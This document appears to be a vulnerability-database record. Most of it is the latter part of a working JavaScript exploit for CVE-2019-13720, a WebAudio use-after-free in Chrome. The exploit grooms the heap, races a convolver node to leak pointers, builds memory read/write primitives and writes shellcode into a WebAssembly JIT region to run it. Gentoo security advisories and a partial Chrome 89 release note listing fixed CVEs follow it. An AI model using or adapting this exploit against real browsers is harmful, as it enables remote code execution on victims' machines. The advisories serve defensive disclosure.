HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) {\n for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) {\n SlotSpanMetaAddress = 
BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct\n HelperBigInt[0] = SlotSpanMetaAddress;\n DebugLog(\"... targeting slot span metadata at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress);\n HelperBigInt[0] = BucketAddress;\n DebugLog(\"... leaked bucket address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n \n if(BucketAddress != BigInt(0)) {\n BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size\n BucketSize = LeakQword(FreeListHead, BucketAddress);\n HelperBigInt[0] = BucketSize;\n DebugLog(\"... leaked bucket size is \" + HelperDword[1].toString(16) + \" \" + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n \n if(HelperDword[0] == SlotSize) {\n DebugLog(\"... found desired slot size! Reading freelist head for SlotSpan...\");\n SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct\n HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress);\n DebugLog(\"... leaked slot span freelist address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n return HelperBigInt[0];\n }\n }\n }\n}\n\nfunction ExecutePayload(FreeListHead) {\n var WasmExport = CreateWasmJITExport();\n let FileReaderObj = new FileReader;\n let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment\n \n DebugLog(\"... WASM module and FileReader created.\");\n FileReaderObj.onerror = WasmExport;\n let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);\n\n if (!FileReaderLoaderPtr) {\n DebugLog(\"... 
failed to obtain free list head for bucket size 0x140 slot span\");\n return;\n }\n \n HelperBigInt[0] = FileReaderLoaderPtr;\n DebugLog(\"... estimated a FileReaderLoader alloc address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent\n let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);\n \n if(ValidationPtr != FileReaderLoaderPtr) {\n HelperBigInt[0] = ValidationPtr;\n DebugLog(\"... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n\n let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28));\n let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr);\n let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr);\n let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8));\n let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8));\n let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1);\n let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1);\n let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1);\n let StubAddrFieldOffset = undefined;\n\n switch (MajorVersion) {\n case 77:\n StubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n break;\n case 76:\n StubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n break\n }\n \n let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset);\n HelperBigInt[0] = RwxJitStubPtr;\n DebugLog(\"... 
resolved JIT stub address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n\n for(var x = 0; x < Egghunter.length; x += 8) {\n JitChunkAddress = RwxJitStubPtr + BigInt(x);\n HelperBigInt[0] = JitChunkAddress;\n //DebugLog(\"... writing chunk of egghunter shellcode at offset \" + x.toString(10) + \" to JIT region at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n \n for(var y = 0; y < 8; y++) {\n HelperUint8[y] = Egghunter[x + y];\n }\n \n WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]);\n }\n \n HelperBigInt[0] = RwxJitStubPtr;\n DebugLog(\"... executing shellcode at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n WasmExport();\n }\n else {\n DebugLog(\"... failed to validate re-claim of FileReaderLoader slot at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n }\n}\n\nasync function PrePayloadHeapGroom() {\n DebugLog(\"... grooming heap in preparation for R/W primitive creation and payload execution...\");\n await GC();\n DoubleAllocAudioBufs = []; // These were the \"holders\" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers. \n\n for (var j = 0; j < 80; j++) {\n MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000));\n }\n\n // At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. 
Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W.\n \n IIRFilters = new Array(1);\n await GC();\n\n for (var j = 0; j < 336; j++) {\n ImageDataArray.push(new ImageData(1, 2));\n }\n \n ImageDataArray = new Array(10);\n await GC();\n\n for (var j = 0; j < MutableFreeListAudioBufs.length; j++) {\n let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer);\n if (MutableFreeListEntry[0] != BigInt(0)) {\n let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent.\n let AllocCount = 0;\n MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr);\n \n // Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated\n \n do {\n GcPreventer.push(new ArrayBuffer(8));\n \n if (++AllocCount > 0x100000) {\n DebugLog(\"... failed to re-claim final free list flink with alloc spray\");\n return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed\n }\n } while (MutableFreeListEntry[0] != BigInt(0));\n \n // The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head).\n \n let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. 
We can now control where new allocs are made without needing to do sprays.\n GcPreventer.push(FreeListHead);\n ExecutePayload(FreeListHead);\n return;\n }\n }\n\n return;\n}\n\nasync function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) {\n let NumberOfChannels = 1;\n let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000);\n let AudioBufferSourceNode = TempAudioCtx.createBufferSource();\n let ConvolverNode = TempAudioCtx.createConvolver();\n let Finished = false;\n\n // Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF)\n\n let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000);\n let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000);\n \n SmallUafBuf.getChannelData(0).fill(0);\n \n for (var i = 0; i < NumberOfChannels; i++) {\n var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer);\n ChannelData[0] = FeedforwardAddress;\n }\n \n AudioBufferSourceNode.buffer = BigSourceBuf;\n ConvolverNode.buffer = SmallUafBuf;\n \n // Setup the audio processing graph and begin rendering\n\n AudioBufferSourceNode.loop = true;\n AudioBufferSourceNode.loopStart = 0;\n AudioBufferSourceNode.loopEnd = 1;\n AudioBufferSourceNode.connect(ConvolverNode);\n ConvolverNode.connect(TempAudioCtx.destination);\n AudioBufferSourceNode.start();\n \n TempAudioCtx.startRendering().then(function(Buf) {\n Buf = null;\n\n if (Finished) {\n TempAudioCtx = null;\n setTimeout(CallbackFunc, 200);\n return;\n } else {\n Finished = true;\n setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1);\n }\n });\n \n while (!Finished) {\n ConvolverNode.buffer = null;\n await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer\n\n if (Finished) {\n break;\n }\n\n for (let i = 0; i < IIRFilters.length; i++) {\n OutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist 
filter created by getFrequencyResponse will see it populated by PI. \n IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray);\n\n if (OutputFloatArray[0] != 3.1415927410125732) {\n Finished = true;\n DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/\"holding\" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own. \n DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000));\n AudioBufferSourceNode.disconnect();\n ConvolverNode.disconnect();\n return;\n }\n }\n\n ConvolverNode.buffer = SmallUafBuf;\n await Sleep(1);\n }\n}\n\nfunction InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) {\n SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used)\n HelperBigInt[0] = LeakedFlinkPtr;\n DebugLog(\"... leaked free list ptr from ScriptNode audio handler at iteration \" + RenderCount.toString(10) + \": \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr);\n DebugLog(\"... 
Super page: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span.\n HelperBigInt[0] = FeedforwardSuperPageBase;\n DebugLog(\"... first Super Page in extent: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase);\n FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit.\n IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data.\n HelperBigInt[0] = IIRFilterFeedforwardAllocPtr;\n DebugLog(\"... IIRFilterFeedforwardAllocPtr: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom);\n}\n\nasync function InfoleakUAF(CallbackFunc) { \n let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. 
When rendering begins, a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processed data after it travels through the ConvolverNode and ScriptNode.\n let AudioBufferSourceNode = TempAudioCtx.createBufferSource();\n let ConvolverNode = TempAudioCtx.createConvolver(); \n let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel.\n let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000);\n let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000); \n let Finished = false;\n let RenderCount = 0;\n\n ConvolverNode.buffer = ChannelBuf;\n AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full\n\n AudioBufferSourceNode.loop = true;\n AudioBufferSourceNode.loopStart = 0;\n AudioBufferSourceNode.loopEnd = 1;\n\n ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread\n AudioBufferSourceNode.connect(ConvolverNode);\n ConvolverNode.connect(ScriptNode);\n ScriptNode.connect(TempAudioCtx.destination);\n\n AudioBufferSourceNode.start();\n \n ScriptNode.onaudioprocess = function(Evt) {\n RenderCount++;\n for (let i = 0; i < 1; i++) {\n let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer);\n\n for (let j = 0; j < ChannelInputBuf.length; j++) {\n /*\n Notably, it is not only the first frame of the input buffer which is checked for the leaked flink.\n There are 16384 frames (each the size of a Float32) copied into the input channel buffer each\n time this handler receives an event. 
Typically only 0-1 of these frames will contain a leaked \n flink freelist pointer.\n */\n\n if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) {\n let TempHelperBigInt = new BigUint64Array(1);\n let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer);\n \n TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer\n TempHelperDword[1] = ChannelInputBuf[j + 1];\n \n let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]);\n\n // Check QWORD from SharedAudioBuffer for a non-zero value\n \n if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) {\n LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region?\n }\n\n if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) {\n // Valid leak: end the recursion cycle for this UAF and execute a callback\n \n Finished = true;\n Evt = null;\n AudioBufferSourceNode.disconnect();\n ScriptNode.disconnect();\n ConvolverNode.disconnect();\n setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1);\n return;\n }\n }\n }\n }\n };\n\n TempAudioCtx.startRendering().then(function(Buf) {\n Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle\n\n if (!Finished) {\n Finished = true;\n InfoleakUAF(CallbackFunc);\n\n }\n });\n\n /*\n Attack the race condition which allows for a free list flink to be copied\n into the ScriptNode input channel buffer: the renderer thread is receiving\n data into the SharedBuffer in the Convolver, processing it, then copying\n it into the ScriptNode input channel until it is full (then the ScriptNode\n receives an event). The SharedBuffer must be freed precisely between the\n time when new data is received from the BufferSource, and the processed data\n is copied into the ScriptNode. 
Simply freeing the buffer will not work, \n since the next chunk of data from the BufferSource will not be placed into\n SharedBuffer if it is NULL. However, there is no check if SharedBuffer is\n NULL when the processed data it contains is copied into the ScriptNode input.\n */\n \n while (!Finished) {\n ConvolverNode.buffer = null;\n ConvolverNode.buffer = ChannelBuf;\n await Sleep(1); // 1ms\n }\n}\n\nfunction FeedforwardHeapGroom() { \n let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000);\n let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data.\n let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data.\n\n // Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory.\n\n FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f\n FeedforwardArray[0] = 0; // Changing these feedforward values has no effect on memory at leaked ptr\n FeedforwardArray[1] = -1;\n\n for (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filters are created directly after page initialization.\n IIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray));\n }\n\n // Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 alloc during init which causes an 0x240 slot span to be created in the first Super Page. \n\n let Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 
61 and lower will consistently crash.\n\n for(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span.\n TempConvolver = TempAudioCtx.createConvolver();\n AudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000);\n TempConvolver.buffer = AudioBuf;\n GcPreventer.push(AudioBuf);\n GcPreventer.push(TempConvolver);\n }\n\n // Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen.\n\n let Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance.\n\n for(var x = 0; x < (Bucket200Slots / 2); x++) {\n TempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size)\n GcPreventer.push(TempConvolver);\n }\n}\n\ntry {\n var BrowserVersion = navigator.userAgent.split(\"Chrome/\")[1].split(\" Safari/\")[0];\n MajorVersion = parseInt(BrowserVersion.substr(0, 2));\n \n if (MajorVersion <= 78) {\n ValidBrowser = true;\n\n if(MajorVersion != 76) {\n alert(\"This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version\");\n }\n }\n else {\n alert(\"CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser\");\n }\n}\ncatch (e) {\n DebugLog(\"... failed to parse browser version from user agent.\");\n}\n\nif(ValidBrowser) {\n FeedforwardHeapGroom();\n InfoleakUAF(InfoleakUAFCallback);\n}\nelse {\n DebugLog(\"... 
unsupported browser version \" + navigator.userAgent);\n}\n</script>\n</html>\n", "sourceHref": "https://0day.today/exploit/37719", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:02:10", "description": "### Background\n\nLibrary for rendering dynamic web content in Qt5 C++ and QML applications. \n\n### Description\n\nA use-after-free vulnerability has been found in the audio component of Qt WebEngine. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file in an application linked against Qt WebEngine, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Qt WebEngine users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-qt/qtwebengine-5.14.1\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-01T00:00:00", "type": "gentoo", "title": "Qt WebEngine: Arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2020-04-01T00:00:00", "id": "GLSA-202004-04", "href": "https://security.gentoo.org/glsa/202004-04", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-17T18:59:29", "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\nGoogle Chrome is one fast, simple, and secure browser for all your devices. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-90.0.4430.93\"\n \n\nAll Google Chrome users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/google-chrome-90.0.4430.93\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-30T00:00:00", "type": "gentoo", "title": "Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-04-30T00:00:00", "id": "GLSA-202104-08", "href": "https://security.gentoo.org/glsa/202104-08", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "chrome": [{"lastseen": "2022-12-29T20:03:17", "description": "The Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks.\n\n\n\n\n\nChrome 89.0.4389.72 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/88.0.4324.182..89.0.4389.72?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<https://chrome.blogspot.com/>) and[ Chromium](<https://blog.chromium.org/>) blog posts about new features and big efforts delivered in 89\n\n\n\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [47](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-0-M89>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$10000][[1171049](<https://crbug.com/1171049>)] High CVE-2021-21159: Heap buffer overflow in TabStrip. Reported by Khalil Zhani on 2021-01-27\n\n[$7500][[1170531](<https://crbug.com/1170531>)] High CVE-2021-21160: Heap buffer overflow in WebAudio. Reported by Marcin 'Icewall' Noga of Cisco Talos on 2021-01-25\n\n[$7500][[1173702](<https://crbug.com/1173702>)] High CVE-2021-21161: Heap buffer overflow in TabStrip. Reported by Khalil Zhani on 2021-02-02\n\n[$5000][[1172054](<https://crbug.com/1172054>)] High CVE-2021-21162: Use after free in WebRTC. 
Reported by Anonymous on 2021-01-29\n\n[$TBD][[1111239](<https://crbug.com/1111239>)] High CVE-2021-21163: Insufficient data validation in Reader Mode. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2020-07-30\n\n[$TBD][[1164846](<https://crbug.com/1164846>)] High CVE-2021-21164: Insufficient data validation in Chrome for iOS. Reported by Muneaki Nishimura (nishimunea) on 2021-01-11\n\n[$TBD][[1174582](<https://crbug.com/1174582>)] High CVE-2021-21165: Object lifecycle issue in audio. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-04\n\n[$TBD][[1177465](<https://crbug.com/1177465>)] High CVE-2021-21166: Object lifecycle issue in audio. Reported by Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-11\n\n[$10000][[1161144](<https://crbug.com/1161144>)] Medium CVE-2021-21167: Use after free in bookmarks. Reported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22\n\n[$5000][[1152226](<https://crbug.com/1152226>)] Medium CVE-2021-21168: Insufficient policy enforcement in appcache. Reported by Luan Herrera (@lbherrera_) on 2020-11-24\n\n[$5000][[1166138](<https://crbug.com/1166138>)] Medium CVE-2021-21169: Out of bounds memory access in V8. Reported by Bohan Liu (@P4nda20371774) and Moon Liang of Tencent Security Xuanwu Lab on 2021-01-13\n\n[$3000][[1111646](<https://crbug.com/1111646>)] Medium CVE-2021-21170: Incorrect security UI in Loader. Reported by David Erceg on 2020-07-31\n\n[$3000][[1152894](<https://crbug.com/1152894>)] Medium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation. Reported by Irvan Kurniawan (sourc7) on 2020-11-25\n\n[$1000][[1150810](<https://crbug.com/1150810>)] Medium CVE-2021-21172: Insufficient policy enforcement in File System API. Reported by Maciej Pulikowski on 2020-11-19\n\n[$500][[1154250](<https://crbug.com/1154250>)] Medium CVE-2021-21173: Side-channel information leakage in Network Internals. 
Reported by Tom Van Goethem from imec-DistriNet, KU Leuven on 2020-12-01\n\n[$NA][[1152999](<https://crbug.com/1152999>)] Medium CVE-2021-21174: Inappropriate implementation in Referrer. Reported by Jun Kokatsu (@shhnjk) on 2020-11-26\n\n[$TBD][[1146651](<https://crbug.com/1146651>)] Medium CVE-2021-21175: Inappropriate implementation in Site isolation. Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on 2020-11-07\n\n[$TBD][[1170584](<https://crbug.com/1170584>)] Medium CVE-2021-21176: Inappropriate implementation in full screen mode. Reported by Luan Herrera (@lbherrera_) on 2021-01-26\n\n[$TBD][[1173879](<https://crbug.com/1173879>)] Medium CVE-2021-21177: Insufficient policy enforcement in Autofill. Reported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability Research on 2021-02-03\n\n[$TBD][[1174186](<https://crbug.com/1174186>)] Medium CVE-2021-21178: Inappropriate implementation in Compositing. Reported by Japong on 2021-02-03\n\n[$TBD][[1174943](<https://crbug.com/1174943>)] Medium CVE-2021-21179: Use after free in Network Internals. Reported by Anonymous on 2021-02-05\n\n[$TBD][[1175507](<https://crbug.com/1175507>)] Medium 